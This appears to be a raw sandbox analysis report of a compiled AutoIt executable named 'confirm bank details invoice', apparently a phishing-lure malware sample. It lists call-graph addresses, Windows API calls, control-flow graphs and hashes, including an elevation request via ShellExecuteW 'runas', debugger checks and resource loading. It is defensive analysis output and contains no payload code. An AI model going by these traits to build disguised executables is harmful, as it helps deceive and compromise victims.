95310 4e423b 95308->95310 95311 476a63 48 API calls 95309->95311 95310->95303 95311->95310 95313 475381 GetModuleFileNameW 95312->95313 95313->95282 95315 49f8a0 __ftell_nolock 95314->95315 95316 47661c GetFullPathNameW 95315->95316 95317 476a63 48 API calls 95316->95317 95318 476643 95317->95318 95321 476571 95318->95321 95322 47657f 95321->95322 95323 47b18b 48 API calls 95322->95323 95324 47658f 95323->95324 95324->95285 95326 47368a 95325->95326 95326->95289 95328 47bce8 95327->95328 95332 474a0a RegOpenKeyExW 95327->95332 95329 48f4ea 48 API calls 95328->95329 95330 47bcf2 95329->95330 95331 48ee75 48 API calls 95330->95331 95331->95332 95332->95301 95332->95302 95333 495dfd 95334 495e09 _doexit 95333->95334 95370 497eeb GetStartupInfoW 95334->95370 95336 495e0e 95372 499ca7 GetProcessHeap 95336->95372 95338 495e66 95339 495e71 95338->95339 95457 495f4d 47 API calls 3 library calls 95338->95457 95373 497b47 95339->95373 95342 495e77 95343 495e82 __RTC_Initialize 95342->95343 95458 495f4d 47 API calls 3 library calls 95342->95458 95394 49acb3 95343->95394 95346 495e91 95347 495e9d GetCommandLineW 95346->95347 95459 495f4d 47 API calls 3 library calls 95346->95459 95413 4a2e7d GetEnvironmentStringsW 95347->95413 95350 495e9c 95350->95347 95354 495ec2 95426 4a2cb4 95354->95426 95357 495ec8 95358 495ed3 95357->95358 95461 49115b 47 API calls 3 library calls 95357->95461 95440 491195 95358->95440 95361 495edb 95362 495ee6 __wwincmdln 95361->95362 95462 49115b 47 API calls 3 library calls 95361->95462 95444 473a0f 95362->95444 95371 497f01 95370->95371 95371->95336 95372->95338 95465 49123a 30 API calls 2 library calls 95373->95465 95375 497b4c 95466 497e23 InitializeCriticalSectionAndSpinCount 95375->95466 95377 497b51 95378 497b55 95377->95378 95468 497e6d TlsAlloc 95377->95468 95467 497bbd 50 API calls 2 library calls 95378->95467 95381 497b5a 95381->95342 95382 497b67 95382->95378 95383 497b72 95382->95383 95469 496986 95383->95469 95386 497bb4 95477 497bbd 50 API calls 2 library calls 95386->95477 95389 497bb9 95389->95342 95390 497b93 95390->95386 95391 497b99 95390->95391 95476 497a94 47 API calls 4 library calls 95391->95476 95393 497ba1 GetCurrentThreadId 95393->95342 95395 49acbf _doexit 95394->95395 95396 497cf4 __lock 47 API calls 95395->95396 95397 49acc6 95396->95397 95398 496986 __calloc_crt 47 API calls 95397->95398 95399 49acd7 95398->95399 95400 49ad42 GetStartupInfoW 95399->95400 95401 49ace2 _doexit @_EH4_CallFilterFunc@8 95399->95401 95407 49ae80 95400->95407 95410 49ad57 95400->95410 95401->95346 95402 49af44 95486 49af58 LeaveCriticalSection _doexit 95402->95486 95404 49aec9 GetStdHandle 95404->95407 95405 496986 __calloc_crt 47 API calls 95405->95410 95406 49aedb GetFileType 95406->95407 95407->95402 95407->95404 95407->95406 95409 49af08 InitializeCriticalSectionAndSpinCount 95407->95409 95408 49ada5 95408->95407 95411 49ade5 InitializeCriticalSectionAndSpinCount 95408->95411 95412 49add7 GetFileType 95408->95412 95409->95407 95410->95405 95410->95407 95410->95408 95411->95408 95412->95408 95412->95411 95414 4a2e8e 95413->95414 95415 495ead 95413->95415 95487 4969d0 47 API calls __crtLCMapStringA_stat 95414->95487 95420 4a2a7b GetModuleFileNameW 95415->95420 95418 4a2eb4 _memcpy_s 95419 4a2eca FreeEnvironmentStringsW 95418->95419 95419->95415 95421 4a2aaf _wparse_cmdline 95420->95421 95422 495eb7 95421->95422 95423 4a2ae9 95421->95423 95422->95354 95460 49115b 47 API calls 3 library calls 95422->95460 95488 4969d0 47 API calls __crtLCMapStringA_stat 95423->95488 95425 4a2aef _wparse_cmdline 95425->95422 95427 4a2ccd __NMSG_WRITE 95426->95427 95428 4a2cc5 95426->95428 95429 496986 __calloc_crt 47 API calls 95427->95429 95428->95357 95433 4a2cf6 __NMSG_WRITE 95429->95433 95430 4a2d4d 95431 491c9d _free 47 API calls 95430->95431 95431->95428 95432 496986 __calloc_crt 47 API calls 95432->95433 95433->95428 95433->95430 95433->95432 95434 4a2d72 95433->95434 95437 4a2d89 95433->95437 95489 4a2567 47 API calls __wtof_l 95433->95489 95435 491c9d _free 47 API calls 95434->95435 95435->95428 95490 496e20 IsProcessorFeaturePresent 95437->95490 95439 4a2d95 95439->95357 95441 4911a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95440->95441 95443 4911e0 __IsNonwritableInCurrentImage 95441->95443 95505 490f0a 52 API calls __cinit 95441->95505 95443->95361 95445 4e1ebf 95444->95445 95446 473a29 95444->95446 95447 473a63 IsThemeActive 95446->95447 95506 491405 95447->95506 95451 473a8f 95518 473adb SystemParametersInfoW SystemParametersInfoW 95451->95518 95453 473a9b 95519 473d19 95453->95519 95457->95339 95458->95343 95459->95350 95465->95375 95466->95377 95467->95381 95468->95382 95472 49698d 95469->95472 95471 4969ca 95471->95386 95475 497ec9 TlsSetValue 95471->95475 95472->95471 95473 4969ab Sleep 95472->95473 95478 4a30aa 95472->95478 95474 4969c2 95473->95474 95474->95471 95474->95472 95475->95390 95476->95393 95477->95389 95479 4a30b5 95478->95479 95483 4a30d0 __calloc_impl 95478->95483 95480 4a30c1 95479->95480 95479->95483 95485 497c0e 47 API calls __getptd_noexit 95480->95485 95481 4a30e0 RtlAllocateHeap 95481->95483 95484 4a30c6 95481->95484 95483->95481 95483->95484 95484->95472 95485->95484 95486->95401 95487->95418 95488->95425 95489->95433 95491 496e2b 95490->95491 95496 496cb5 95491->95496 95495 496e46 95495->95439 95497 496ccf _memset ___raise_securityfailure 95496->95497 95498 496cef IsDebuggerPresent 95497->95498 95504 4981ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95498->95504 95500 49a70c __wtof_l 6 API calls 95502 496dd6 95500->95502 95501 496db3 ___raise_securityfailure 95501->95500 95503 498197 GetCurrentProcess TerminateProcess 95502->95503 95503->95495 95504->95501 95505->95443 95507 497cf4 __lock 47 API calls 95506->95507 95508 491410 95507->95508 95571 497e58 LeaveCriticalSection 95508->95571 95510 473a88 95511 49146d 95510->95511 95512 491491 95511->95512 95513 491477 95511->95513 95512->95451 95513->95512 95572 497c0e 47 API calls __getptd_noexit 95513->95572 95515 491481 95573 496e10 8 API calls __wtof_l 95515->95573 95517 49148c 95517->95451 95518->95453 95520 473d26 __ftell_nolock 95519->95520 95521 47d7f7 48 API calls 95520->95521 95522 473d31 GetCurrentDirectoryW 95521->95522 95574 4761ca 95522->95574 95571->95510 95572->95515 95573->95517 95691 48e99b 95574->95691 95578 4761eb 95579 475374 50 API calls 95578->95579 95580 4761ff 95579->95580 95581 47ce19 48 API calls 95580->95581 95582 47620c 95581->95582 95708 4739db 95582->95708 95584 476216 Mailbox 95585 476eed 48 API calls 95584->95585 95586 47622b 95585->95586 95720 479048 95586->95720 95589 47ce19 48 API calls 95590 476244 95589->95590 95591 47d6e9 55 API calls 95590->95591 95592 476254 Mailbox 95591->95592 95593 47ce19 48 API calls 95592->95593 95594 47627c 95593->95594 95595 47d6e9 55 API calls 95594->95595 95596 47628f Mailbox 95595->95596 95597 47ce19 48 API calls 95596->95597 95598 4762a0 95597->95598 95599 47d645 53 API calls 95598->95599 95600 4762b2 Mailbox 95599->95600 95601 47d7f7 48 API calls 95600->95601 95602 4762c5 95601->95602 95723 4763fc 95602->95723 95606 4762df 95607 4e1c08 95606->95607 95608 4762e9 95606->95608 95609 4763fc 48 API calls 95607->95609 95610 490fa7 _W_store_winword 59 API calls 95608->95610 95611 4e1c1c 95609->95611 95612 4762f4 95610->95612 95615 4763fc 48 API calls 95611->95615 95612->95611 95613 4762fe 95612->95613 95614 490fa7 _W_store_winword 59 API calls 95613->95614 95616 476309 95614->95616 95617 4e1c38 95615->95617 95616->95617 95618 476313 95616->95618 95620 475374 50 API calls 95617->95620 95619 490fa7 _W_store_winword 59 API calls 95618->95619 95621 47631e 95619->95621 95622 4e1c5d 95620->95622 95624 47635f 95621->95624 95626 4e1c86 95621->95626 95629 4763fc 48 API calls 95621->95629 95623 4763fc 48 API calls 95622->95623 95625 4e1c69 95623->95625 95624->95626 95627 47636c 95624->95627 95628 476eed 48 API calls 95625->95628 95630 476eed 48 API calls 95626->95630 95631 48c050 48 API calls 95627->95631 95632 4e1c77 95628->95632 95633 476342 95629->95633 95634 4e1ca8 95630->95634 95635 476384 95631->95635 95636 4763fc 48 API calls 95632->95636 95637 476eed 48 API calls 95633->95637 95638 4763fc 48 API calls 95634->95638 95639 481b90 48 API calls 95635->95639 95636->95626 95640 476350 95637->95640 95641 4e1cb5 95638->95641 95645 476394 95639->95645 95642 4763fc 48 API calls 95640->95642 95641->95641 95642->95624 95692 47d7f7 48 API calls 95691->95692 95693 4761db 95692->95693 95694 476009 95693->95694 95695 476016 __ftell_nolock 95694->95695 95696 476a63 48 API calls 95695->95696 95701 47617c Mailbox 95695->95701 95698 476048 95696->95698 95706 47607e Mailbox 95698->95706 95740 4761a6 95698->95740 95699 47614f 95700 47ce19 48 API calls 95699->95700 95699->95701 95703 476170 95700->95703 95701->95578 95702 47ce19 48 API calls 95702->95706 95704 4764cf 48 API calls 95703->95704 95704->95701 95705 4764cf 48 API calls 95705->95706 95706->95699 95706->95701 95706->95702 95706->95705 95707 4761a6 48 API calls 95706->95707 95707->95706 95709 4741a9 136 API calls 95708->95709 95710 4739fe 95709->95710 95711 473a06 95710->95711 95743 4bc396 95710->95743 95711->95584 95714 4e2ff0 95716 491c9d _free 47 API calls 95714->95716 95715 474252 84 API calls 95715->95714 95717 4e2ffd 95716->95717 95718 474252 84 API calls 95717->95718 95719 4e3006 95718->95719 95719->95719 95721 48f4ea 48 API calls 95720->95721 95722 476237 95721->95722 95722->95589 95724 476406 95723->95724 95725 47641f 95723->95725 95726 476eed 48 API calls 95724->95726 95727 476a63 48 API calls 95725->95727 95728 4762d1 95726->95728 95727->95728 95729 490fa7 95728->95729 95730 491028 95729->95730 95731 490fb3 95729->95731 95780 49103a 59 API calls 3 library calls 95730->95780 95735 490fd8 95731->95735 95778 497c0e 47 API calls __getptd_noexit 95731->95778 95734 491035 95734->95606 95735->95606 95736 490fbf 95779 496e10 8 API calls __wtof_l 95736->95779 95738 490fca 95738->95606 95741 47bdfa 48 API calls 95740->95741 95742 4761b1 95741->95742 95742->95698 95744 474517 83 API calls 95743->95744 95745 4bc405 95744->95745 95746 4bc56d 94 API calls 95745->95746 95747 4bc417 95746->95747 95748 4744ed 64 API calls 95747->95748 95777 4bc41b 95747->95777 95749 4bc432 95748->95749 95750 4744ed 64 API calls 95749->95750 95751 4bc442 95750->95751 95752 4744ed 64 API calls 95751->95752 95753 4bc45d 95752->95753 95754 4744ed 64 API calls 95753->95754 95755 4bc478 95754->95755 95756 474517 83 API calls 95755->95756 95757 4bc48f 95756->95757 95758 49395c __crtLCMapStringA_stat 47 API calls 95757->95758 95759 4bc496 95758->95759 95760 49395c __crtLCMapStringA_stat 47 API calls 95759->95760 95761 4bc4a0 95760->95761 95762 4744ed 64 API calls 95761->95762 95763 4bc4b4 95762->95763 95764 4bbf5a GetSystemTimeAsFileTime 95763->95764 95765 4bc4c7 95764->95765 95766 4bc4dc 95765->95766 95767 4bc4f1 95765->95767 95768 491c9d _free 47 API calls 95766->95768 95769 4bc4f7 95767->95769 95770 4bc556 95767->95770 95772 4bc4e2 95768->95772 95773 4bb965 118 API calls 95769->95773 95771 491c9d _free 47 API calls 95770->95771 95771->95777 95775 491c9d _free 47 API calls 95772->95775 95774 4bc54e 95773->95774 95776 491c9d _free 47 API calls 95774->95776 95775->95777 95776->95777 95777->95714 95777->95715 95778->95736 95779->95738 95780->95734 95991 4e19ba 95996 48c75a 95991->95996 95995 4e19c9 95997 47d7f7 48 API calls 95996->95997 95998 48c7c8 95997->95998 96004 48d26c 95998->96004 96001 48c865 96002 48c881 96001->96002 96007 48d1fa 48 API calls _memcpy_s 96001->96007 96003 490f0a 52 API calls __cinit 96002->96003 96003->95995 96008 48d298 96004->96008 96007->96001 96009 48d28b 96008->96009 96010 48d2a5 96008->96010 96009->96001 96010->96009 96011 48d2ac RegOpenKeyExW 96010->96011 96011->96009 96012 48d2c6 RegQueryValueExW 96011->96012 96013 48d2fc RegCloseKey 96012->96013 96014 48d2e7 96012->96014 96013->96009 96014->96013 96015 4e197b 96020 48dd94 96015->96020 96019 4e198a 96021 48f4ea 48 API calls 96020->96021 96022 48dd9c 96021->96022 96023 48ddb0 96022->96023 96028 48df3d 96022->96028 96027 490f0a 52 API calls __cinit 96023->96027 96027->96019 96029 48dda8 96028->96029 96030 48df46 96028->96030 96032 48ddc0 96029->96032 96060 490f0a 52 API calls __cinit 96030->96060 96033 47d7f7 48 API calls 96032->96033 96034 48ddd7 GetVersionExW 96033->96034 96035 476a63 48 API calls 96034->96035 96036 48de1a 96035->96036 96061 48dfb4 96036->96061 96039 476571 48 API calls 96043 48de2e 96039->96043 96040 4e24c8 96043->96040 96065 48df77 96043->96065 96044 48dea4 GetCurrentProcess 96074 48df5f LoadLibraryA GetProcAddress 96044->96074 96045 48debb 96046 48df31 GetSystemInfo 96045->96046 96047 48dee3 96045->96047 96050 48df0e 96046->96050 96068 48e00c 96047->96068 96052 48df1c FreeLibrary 96050->96052 96053 48df21 96050->96053 96052->96053 96053->96023 96054 48df29 GetSystemInfo 96057 48df03 96054->96057 96055 48def9 96071 48dff4 96055->96071 96057->96050 96059 48df09 FreeLibrary 96057->96059 96059->96050 96060->96029 96062 48dfbd 96061->96062 96063 47b18b 48 API calls 96062->96063 96064 48de22 96063->96064 96064->96039 96075 48df89 96065->96075 96079 48e01e 96068->96079 96072 48e00c 2 API calls 96071->96072 96073 48df01 GetNativeSystemInfo 96072->96073 96073->96057 96074->96045 96076 48dea0 96075->96076 96077 48df92 LoadLibraryA 96075->96077 96076->96044 96076->96045 96077->96076 96078 48dfa3 GetProcAddress 96077->96078 96078->96076 96080 48def1 96079->96080 96081 48e027 LoadLibraryA 96079->96081 96080->96054 96080->96055 96081->96080 96082 48e038 GetProcAddress 96081->96082 96082->96080 96083 4e8eb8 96087 4ba635 96083->96087 96085 4e8ec3 96086 4ba635 84 API calls 96085->96086 96086->96085 96092 4ba642 96087->96092 96097 4ba66f 96087->96097 96088 4ba671 96099 48ec4e 81 API calls 96088->96099 96090 4ba676 96091 47936c 81 API calls 96090->96091 96093 4ba67d 96091->96093 96092->96088 96092->96090 96095 4ba669 96092->96095 96092->96097 96094 47510d 48 API calls 96093->96094 96094->96097 96098 484525 61 API calls _memcpy_s 96095->96098 96097->96085 96098->96097 96099->96090 96100 47b7b1 96109 47c62c 96100->96109 96102 47b7ec 96104 47ba85 48 API calls 96102->96104 96103 47b7c2 96103->96102 96117 47bc74 48 API calls 96103->96117 96108 47b6b7 Mailbox 96104->96108 96106 47b7e0 96107 47ba85 48 API calls 96106->96107 96107->96102 96110 47bcce 48 API calls 96109->96110 96115 47c63b 96110->96115 96111 4e39fd 96118 4b26bc 88 API calls 4 library calls 96111->96118 96113 4e3a0b 96114 47c799 48 API calls 96114->96115 96115->96111 96115->96114 96116 47c68b 96115->96116 96116->96103 96117->96106 96118->96113 96119 47f030 96120 483b70 335 API calls 96119->96120 96121 47f03c 96120->96121

                    Executed Functions

                    Function 0049B043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 644 49b043-49b080 call 49f8a0 647 49b089-49b08b 644->647 648 49b082-49b084 644->648 650 49b08d-49b0a7 call 497bda call 497c0e call 496e10 647->650 651 49b0ac-49b0d9 647->651 649 49b860-49b86c call 49a70c 648->649 650->649 652 49b0db-49b0de 651->652 653 49b0e0-49b0e7 651->653 652->653 656 49b10b-49b110 652->656 657 49b0e9-49b100 call 497bda call 497c0e call 496e10 653->657 658 49b105 653->658 662 49b11f-49b12d call 4a3bf2 656->662 663 49b112-49b11c call 49f82f 656->663 693 49b851-49b854 657->693 658->656 674 49b44b-49b45d 662->674 675 49b133-49b145 662->675 663->662 678 49b7b8-49b7d5 WriteFile 674->678 679 49b463-49b473 674->679 675->674 677 49b14b-49b183 call 497a0d GetConsoleMode 675->677 677->674 697 49b189-49b18f 677->697 685 49b7e1-49b7e7 GetLastError 678->685 686 49b7d7-49b7df 678->686 682 49b479-49b484 679->682 683 49b55a-49b55f 679->683 691 49b81b-49b833 682->691 692 49b48a-49b49a 682->692 688 49b663-49b66e 683->688 689 49b565-49b56e 683->689 687 49b7e9 685->687 686->687 694 49b7ef-49b7f1 687->694 688->691 701 49b674 688->701 689->691 695 49b574 689->695 699 49b83e-49b84e call 497c0e call 497bda 691->699 700 49b835-49b838 691->700 698 49b4a0-49b4a3 692->698 696 49b85e-49b85f 693->696 703 49b7f3-49b7f5 694->703 704 49b856-49b85c 694->704 705 49b57e-49b595 695->705 696->649 706 49b199-49b1bc GetConsoleCP 697->706 707 49b191-49b193 697->707 708 49b4e9-49b520 WriteFile 698->708 709 49b4a5-49b4be 698->709 699->693 700->699 710 49b83a-49b83c 700->710 711 49b67e-49b693 701->711 703->691 714 49b7f7-49b7fc 703->714 704->696 715 49b59b-49b59e 705->715 716 49b440-49b446 706->716 717 49b1c2-49b1ca 706->717 707->674 707->706 708->685 720 49b526-49b538 708->720 718 49b4cb-49b4e7 709->718 719 49b4c0-49b4ca 709->719 710->696 712 49b699-49b69b 711->712 721 49b6d8-49b719 WideCharToMultiByte 712->721 722 49b69d-49b6b3 712->722 724 49b7fe-49b810 call 497c0e call 497bda 714->724 725 49b812-49b819 call 497bed 714->725 726 49b5de-49b627 WriteFile 715->726 727 49b5a0-49b5b6 715->727 716->703 728 49b1d4-49b1d6 717->728 718->698 718->708 719->718 720->694 729 49b53e-49b54f 720->729 721->685 734 49b71f-49b721 721->734 731 49b6b5-49b6c4 722->731 732 49b6c7-49b6d6 722->732 724->693 725->693 726->685 739 49b62d-49b645 726->739 736 49b5b8-49b5ca 727->736 737 49b5cd-49b5dc 727->737 740 49b36b-49b36e 728->740 741 49b1dc-49b1fe 728->741 729->692 730 49b555 729->730 730->694 731->732 732->712 732->721 744 49b727-49b75a WriteFile 734->744 736->737 737->715 737->726 739->694 747 49b64b-49b658 739->747 742 49b370-49b373 740->742 743 49b375-49b3a2 740->743 748 49b200-49b215 741->748 749 49b217-49b223 call 491688 741->749 742->743 750 49b3a8-49b3ab 742->750 743->750 751 49b77a-49b78e GetLastError 744->751 752 49b75c-49b776 744->752 747->705 754 49b65e 747->754 755 49b271-49b283 call 4a40f7 748->755 764 49b269-49b26b 749->764 765 49b225-49b239 749->765 758 49b3ad-49b3b0 750->758 759 49b3b2-49b3c5 call 4a5884 750->759 763 49b794-49b796 751->763 752->744 760 49b778 752->760 754->694 774 49b289 755->774 775 49b435-49b43b 755->775 758->759 766 49b407-49b40a 758->766 759->685 778 49b3cb-49b3d5 759->778 760->763 763->687 769 49b798-49b7b0 763->769 764->755 771 49b23f-49b254 call 4a40f7 765->771 772 49b412-49b42d 765->772 766->728 770 49b410 766->770 769->711 776 49b7b6 769->776 770->775 771->775 784 49b25a-49b267 771->784 772->775 779 49b28f-49b2c4 WideCharToMultiByte 774->779 775->687 776->694 781 49b3fb-49b401 778->781 782 49b3d7-49b3ee call 4a5884 778->782 779->775 783 49b2ca-49b2f0 WriteFile 779->783 781->766 782->685 789 49b3f4-49b3f5 782->789 783->685 786 49b2f6-49b30e 783->786 784->779 786->775 788 49b314-49b31b 786->788 788->781 790 49b321-49b34c WriteFile 788->790 789->781 790->685 791 49b352-49b359 790->791 791->775 792 49b35f-49b366 791->792 792->781
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9aa2946a0a02e17f8ab3ebfeb4dc56589465331e33c4191759225acf552b8a9f
                    • Instruction ID: 49bdfc38999b0cc67401450b741ab0b7962de563bac3c4d06c5d6264cb6cf1a5
                    • Opcode Fuzzy Hash: 9aa2946a0a02e17f8ab3ebfeb4dc56589465331e33c4191759225acf552b8a9f
                    • Instruction Fuzzy Hash: F2326075A022188FCF24CF54ED456EABBB5FF46314F0441EAE40AA7A91D7349D80CF96
                    Function 00473D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00473AA3,?), ref: 00473D45
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,00473AA3,?), ref: 00473D57
                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00531148,00531130,?,?,?,?,00473AA3,?), ref: 00473DC8
                      • Part of subcall function 00476430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00473DEE,00531148,?,?,?,?,?,00473AA3,?), ref: 00476471
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,00473AA3,?), ref: 00473E48
                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005228F4,00000010), ref: 004E1CCE
                    • SetCurrentDirectoryW.KERNEL32(?,00531148,?,?,?,?,?,00473AA3,?), ref: 004E1D06
                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0050DAB4,00531148,?,?,?,?,?,00473AA3,?), ref: 004E1D89
                    • ShellExecuteW.SHELL32(00000000,?,?,?,?,00473AA3), ref: 004E1D90
                      • Part of subcall function 00473E6E: GetSysColorBrush.USER32(0000000F), ref: 00473E79
                      • Part of subcall function 00473E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00473E88
                      • Part of subcall function 00473E6E: LoadIconW.USER32(00000063), ref: 00473E9E
                      • Part of subcall function 00473E6E: LoadIconW.USER32(000000A4), ref: 00473EB0
                      • Part of subcall function 00473E6E: LoadIconW.USER32(000000A2), ref: 00473EC2
                      • Part of subcall function 00473E6E: RegisterClassExW.USER32(?), ref: 00473F30
                      • Part of subcall function 004736B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004736E6
                      • Part of subcall function 004736B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00473707
                      • Part of subcall function 004736B8: ShowWindow.USER32(00000000,?,?,?,?,00473AA3,?), ref: 0047371B
                      • Part of subcall function 004736B8: ShowWindow.USER32(00000000,?,?,?,?,00473AA3,?), ref: 00473724
                      • Part of subcall function 00474FFC: _memset.LIBCMT ref: 00475022
                      • Part of subcall function 00474FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004750CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                    • String ID: ()R$This is a third-party compiled AutoIt script.$runas
                    • API String ID: 438480954-2871243473
                    • Opcode ID: ca7ec14b365b40744be1d7433bb95ec6f4e84a73207aa19e206732c1c7fddcf2
                    • Instruction ID: e3f2763818cab12f8c45c454d979a1251262c7bb1ddec82003831778c47252ce
                    • Opcode Fuzzy Hash: ca7ec14b365b40744be1d7433bb95ec6f4e84a73207aa19e206732c1c7fddcf2
                    • Instruction Fuzzy Hash: A8514830E04644AACB01AFF1DC45DEE7B75AF19705F00C06BF505662A2DB785649EB2E
                    Function 0048DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1084 48ddc0-48de4f call 47d7f7 GetVersionExW call 476a63 call 48dfb4 call 476571 1093 4e24c8-4e24cb 1084->1093 1094 48de55-48de56 1084->1094 1097 4e24cd 1093->1097 1098 4e24e4-4e24e8 1093->1098 1095 48de58-48de63 1094->1095 1096 48de92-48dea2 call 48df77 1094->1096 1099 4e244e-4e2454 1095->1099 1100 48de69-48de6b 1095->1100 1115 48dea4-48dec1 GetCurrentProcess call 48df5f 1096->1115 1116 48dec7-48dee1 1096->1116 1102 4e24d0 1097->1102 1103 4e24ea-4e24f3 1098->1103 1104 4e24d3-4e24dc 1098->1104 1109 4e245e-4e2464 1099->1109 1110 4e2456-4e2459 1099->1110 1106 4e2469-4e2475 1100->1106 1107 48de71-48de74 1100->1107 1102->1104 1103->1102 1105 4e24f5-4e24f8 1103->1105 1104->1098 1105->1104 1111 4e247f-4e2485 1106->1111 1112 4e2477-4e247a 1106->1112 1113 48de7a-48de89 1107->1113 1114 4e2495-4e2498 1107->1114 1109->1096 1110->1096 1111->1096 1112->1096 1119 4e248a-4e2490 1113->1119 1120 48de8f 1113->1120 1114->1096 1121 4e249e-4e24b3 1114->1121 1115->1116 1136 48dec3 1115->1136 1117 48df31-48df3b GetSystemInfo 1116->1117 1118 48dee3-48def7 call 48e00c 1116->1118 1127 48df0e-48df1a 1117->1127 1131 48df29-48df2f GetSystemInfo 1118->1131 1132 48def9-48df01 call 48dff4 GetNativeSystemInfo 1118->1132 1119->1096 1120->1096 1124 4e24bd-4e24c3 1121->1124 1125 4e24b5-4e24b8 1121->1125 1124->1096 1125->1096 1129 48df1c-48df1f FreeLibrary 1127->1129 1130 48df21-48df26 1127->1130 1129->1130 1135 48df03-48df07 1131->1135 1132->1135 1135->1127 1138 48df09-48df0c FreeLibrary 1135->1138 1136->1116 1138->1127
                    APIs
                    • GetVersionExW.KERNEL32(?), ref: 0048DDEC
                    • GetCurrentProcess.KERNEL32(00000000,0050DC38,?,?), ref: 0048DEAC
                    • GetNativeSystemInfo.KERNELBASE(?,0050DC38,?,?), ref: 0048DF01
                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0048DF0C
                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0048DF1F
                    • GetSystemInfo.KERNEL32(?,0050DC38,?,?), ref: 0048DF29
                    • GetSystemInfo.KERNEL32(?,0050DC38,?,?), ref: 0048DF35
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                    • String ID:
                    • API String ID: 3851250370-0
                    • Opcode ID: 11f72345c335e393f6c72ca16af147353ec5712322cddd6496d4b64f1c8e83f3
                    • Instruction ID: 2718635847419978543286695ad90cfa835d3ca938418460c75b6197a899c9d4
                    • Opcode Fuzzy Hash: 11f72345c335e393f6c72ca16af147353ec5712322cddd6496d4b64f1c8e83f3
                    • Instruction Fuzzy Hash: 9461B571C0A2C4DBCF16DF6994C11EE7FB46F29300B1949DAD8455F38BC668C909CB6A
                    Function 0047406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1186 47406b-474083 CreateStreamOnHGlobal 1187 474085-47409c FindResourceExW 1186->1187 1188 4740a3-4740a6 1186->1188 1189 4740a2 1187->1189 1190 4e4f16-4e4f25 LoadResource 1187->1190 1189->1188 1190->1189 1191 4e4f2b-4e4f39 SizeofResource 1190->1191 1191->1189 1192 4e4f3f-4e4f4a LockResource 1191->1192 1192->1189 1193 4e4f50-4e4f6e 1192->1193 1193->1189
                    APIs
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0047449E,?,?,00000000,00000001), ref: 0047407B
